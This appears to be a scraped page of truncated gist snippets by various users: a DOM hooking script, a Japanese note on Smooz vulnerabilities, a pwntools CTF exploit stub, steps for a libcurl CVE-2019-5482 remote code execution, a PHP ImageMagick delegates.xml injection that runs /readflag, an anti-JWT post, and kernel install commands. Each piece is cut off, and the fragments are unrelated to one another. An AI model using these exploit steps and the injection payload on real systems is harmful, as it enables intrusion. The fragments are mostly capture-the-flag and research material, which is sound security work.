fransr

var logger = console.trace;

// ELEMENT

;(getElementByIdCopy => {
  Element.prototype.getElementById = function(q) {
    logger('getElementById', q, this, this.innerHTML);
    return Reflect.apply(getElementByIdCopy, this, [q])
  }
})(Element.prototype.getElementById)

mala

Smoozサービス終了に寄せて

前置き

• この文章と、それに含まれる考察や各サービスへの脆弱性報告などはmala個人の活動であり、所属している企業とは関係ありません。
• 一方で私は、企業が閲覧履歴を収集して何をしたいのか、所属してる企業や他社事例について、ある程度詳しい当事者でもあります。
• 一般論として書けることは書けるが、(業務上知り得た知識で開示されてないものなど)個別具体的なことは書けないこともあり、また観測範囲に偏りがある可能性もあります。

Smoozに報告した脆弱性2件

shpik-kr

from pwn import *

#r = process('./plane_market')
r = remote('tasks.aeroctf.com', 33087)


c0 = lambda:r.recvuntil(':')
c1 = lambda:r.recvuntil('>')
s = lambda x:r.send(str(x))
sl = lambda x:r.sendline(str(x))

PaulCher

0. Confirm that you have unpatched version of libcurl, which contains CVE-2019-5482
1. Update ip addresses at the source files
2. Launch srv.py on the server
3. Upload sol.php via curl: curl http://$URL:$PORT/ -d 'rce@sol.php'

icchy

123;
    return 123;
}
extern void *opendir(const char *);
extern void *readdir(void *);
extern void *shmat(int, const void *, int);
typedef struct {
    ino_t d_ino;
    off_t d_off;
    unsigned short d_reclen;

mschep

# Very minimal BIRD2 configuration with RPKI enabled

log syslog { info, remote, warning, error, auth, fatal, bug };
log "/var/log/bird.debug.log" { debug, remote, trace };

router id 193.0.31.28;

protocol device {
}

tyage

<?php
$home = '/tmp/84d99af2ce44bb1dd3398190b930c8ac';
ini_set('display_errors', 1); 
mkdir("$home/.magick/");
file_put_contents("$home/.magick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>");
mkdir("$home/.config/");
mkdir("$home/.config/ImageMagick");
file_put_contents("$home/.config/ImageMagick/delegates.xml", "<delegatemap><delegate decode=\"foo\" command=\"/readflag > $home/flag\"/></delegatemap>");
touch("$home/test.foo");
$_ENV['HOME'] = $home;

samsch

Stop using JWTs!

TLDR: JWTs should not be used for keeping your user logged in. They are not designed for this purpose, they are not secure, and there is a much better tool which is designed for it: regular cookie sessions.

If you've got a bit of time to watch a presentation on it, I highly recommend this talk: https://www.youtube.com/watch?v=pYeekwv3vC4 (Note that other topics are largely skimmed over, such as CSRF protection. You should learn about other topics from other sources. Also note that "valid" usecases for JWTs at the end of the video can also be easily handled by other, better, and more secure tools. Specifically, PASETO.)

A related topic: Don't use localStorage (or sessionStorage) for authentication credentials, including JWT tokens: https://www.rdegges.com/2018/please-stop-using-local-storage/

The reason to avoid JWTs comes down to a couple different points:

• The JWT specification is specifically designed only for very short-live tokens (~5 minute or less). Sessions

tomwwright

# perform a fresh install of Ubuntu 17.10

# upgrade the kernel to v4.13.10
mkdir ~/kernel-v4.13.10
cd ~/kernel-v4.13.10
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.13.10/linux-headers-4.13.10-041310_4.13.10-041310.201710270531_all.deb
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.13.10/linux-headers-4.13.10-041310-generic_4.13.10-041310.201710270531_amd64.deb
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.13.10/linux-image-4.13.10-041310-generic_4.13.10-041310.201710270531_amd64.deb
sudo dpkg -i *.deb

Jinmo

/*
first malloc(16)        : 0x1a61450
eh.. and malloc(-1)     : (nil)
second malloc(16)       : 0x7fe57c0008c0
FYI, libc.so address is : 0x7fe5837dc000
let's calculate!        : 0x7fe580000000
*/

#include <stdio.h>
#include <stdlib.h>